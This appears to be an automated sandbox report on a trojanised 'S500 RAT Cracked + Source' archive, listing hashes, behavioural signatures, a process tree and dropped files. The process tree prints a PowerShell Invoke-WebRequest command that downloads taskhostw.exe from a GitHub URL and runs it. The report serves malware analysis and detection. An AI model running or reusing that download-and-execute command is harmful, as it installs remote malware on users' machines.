Analysis
-
max time kernel
1287s -
max time network
1172s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
20-03-2024 17:22
General
-
Target
S500 RAT Cracked + Source .rar
-
Size
147.7MB
-
MD5
5a39139ce5f13297aea9c5839d1447c6
-
SHA1
90c68a4f451c2fe75c6325198693b6f52971d573
-
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
-
SHA512
7a98ebd2ffb9dec789ddf5adf9fe2dad5a9527cb2e2c038933722012a9ead3fac98280dbf32f0ef5aaa4b6c57afe7768cdd2018e632fbe415c56925833e536b1
-
SSDEEP
3145728:Lp+2zwG6H0uXZ2nlHp75eJmivGPIpVQNQSsnyDZ5lc:Ls2cG1FlHp7ImqO8VIGyba
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies registry class 2 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt3⤵
- Opens file in notepad (likely ransom note)
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe3⤵
-
-
-
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E61B.tmp\E61C.tmp\E61D.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
-
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exeServerRegistrationManager.exe3⤵
- Executes dropped EXE
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe3⤵
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5ef5ef35c3059825861b16409862d0e3d
SHA1cde5311765478b1bcf309219c1a86a0238612099
SHA25653df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b
SHA5123c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20
-
Filesize
1KB
MD5fc4af7384f0b6f274dd3e745f0aceeaa
SHA131b310f869b15b84e52ef282cabaee974e5043cf
SHA256f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f
-
Filesize
76KB
MD5944ce5123c94c66a50376e7b37e3a6a6
SHA1a1936ac79c987a5ba47ca3d023f740401f73529b
SHA2567da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a
SHA5124c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b
-
Filesize
2.3MB
MD56d6e172e7965d1250a4a6f8a0513aa9f
SHA1b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA51235daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155
-
Filesize
278KB
MD59fbb8cec55b2115c00c0ba386c37ce62
SHA1e2378a1c22c35e40fd1c3e19066de4e33b50f24a
SHA2569f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026
SHA512da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04
-
Filesize
22KB
MD50a4e049a213aef04a4b1fa145a76a752
SHA13603cb74a5883c3086cb483eb5ed2a1d452fbeb1
SHA256203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f
SHA51223ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016
-
Filesize
90KB
MD55c43b1a8ce131be5e8271794ec520a54
SHA11d2f31f18ac0b543bab6a1f45ac2d388a6ad119a
SHA256048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153
SHA5124ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6
-
Filesize
67KB
MD5beda8bbd2a72e45431cf5dd68f7c6e61
SHA118e28ada040e4c62e33d946046a9ccf66f839f0d
SHA256f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c
SHA5126287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899
-
Filesize
66KB
MD5fa80841e3dc9ffb31dd5d015c1030172
SHA1aa0d9e66db2a8528edf9931fe132f18870307216
SHA256a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9
SHA512a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd
-
Filesize
1KB
MD53108edc3f74d08bec485f1fc0aabab5b
SHA1e1e14322ab3e69a69a7b0c9efd5b845a112320b8
SHA256e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584
SHA512750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e
-
Filesize
577B
MD53d9ef7c4c2db6e7631832825418a9ba6
SHA1b2ac00b06d61c8498914ea52eaedaab01fae1a21
SHA2566d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7
SHA512641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035
-
Filesize
427B
MD5531208ea558a68c95339bea9517845c3
SHA195865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA51246f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.9MB
MD54544872c197f9ad471bb18c648b004b0
SHA1280a1ec5ab002d1ab15279b3fb0de8dd3c4aa482
SHA256bf4aec4b6a094c21008b4788be9ca7072fcff0800cf1c098828222769b311e7b
SHA512aaf6a5a357976f6a83672009d3648f4dd7303bdd91eeca6b2d1ce35f59cb65563daa70505162f862bb7ce322d9645dbabd49e9a8f8a9e22d4d169f3d59ac8aca
-
Filesize
10.1MB
MD59b694ed7d344cd6f2e02977fbdc07a0a
SHA12bc6f78a91b26026c51051e646d788488c776855
SHA2562bcd8656e5e55f05143a5fd31434719e0b843567f3a7b69a392b4abb17fc63bd
SHA5126ce0b9a9cac4b42ffd8c7f337a41e475595b051c68529e299df7519016c7b9883af10921683a919fe8ae3069740d4c96d4f645edeb0891fc4e01fc73b17a2518
-
Filesize
18.0MB
MD55b52658c4517684971de10a6b7a67c30
SHA1f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA2563ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6
-
Filesize
9.7MB
MD57ba3ab7d000bd8f2206e08abdbe74d7d
SHA16940a66fecfed2706db0368b36a9a27f20b93e25
SHA25605156b19fa8699fa4aa7f59d07fb78730d5313d025c242ac4cdf591d928e97e1
SHA512c42a3fe48e2bad222a72742028e2709a59fa0d36915c07f7332436d31b452ce358765c418fc7f0011849e10468363470f732b56b2c17029e5003b9c9ef033249
-
Filesize
266KB
MD5e90f5f88df944bd07f5e2f42a2665200
SHA1f1f55ee3fe858e854848d4c3ccdebc9b3009f638
SHA256e4770d767eed1e5bf31d2eeb8e543b60eeffff423515eb60a1c9329ff66ea9dc
SHA512c605c4f392cfa61e50b47c2d24c4a69d54f657e4f6c99a8da73cc0ae2d240257f4bedbcb508757e70e96f868e078e6d8969ad94fb677356fa9278279e45c82da
-
Filesize
1.7MB
MD57a8d11174bebefad4409d477b20825b7
SHA1b6d0e9230fe339b4d200acbf401f66a6facd3a08
SHA2560760e54f54e20d7d63e5016eb204e913633ce5857d1fc722ac39977453712e3b
SHA5122116a695a640390fdf6558c6def1900eb6edff1ac3e65030ea81ae346f1965135ab97600c4c20cb3bddc7db643e42cc74e88829bf78c9d254e7014648b88f2cb
-
Filesize
1.3MB
MD59e83a638e31058801b0ddeea8202760d
SHA19fdfafd6855469dd3f6171f7c6283d94c477e9e8
SHA2566f296f3c16c7aba99d3ed032a186934280bda76db96e9322bef5193d306a8df7
SHA51220378249a49ecb99367c715087cb2b80b1a75c198b67e0c800c458b7d2f403e85e295d00f612cf8f12b0dd6698062a761e71e2ae7477e117dce5eb394770d10c
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
2.0MB
-
Filesize
16.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
7.6MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
228KB
-
Filesize
228KB
-
Filesize
228KB
-
Filesize
228KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB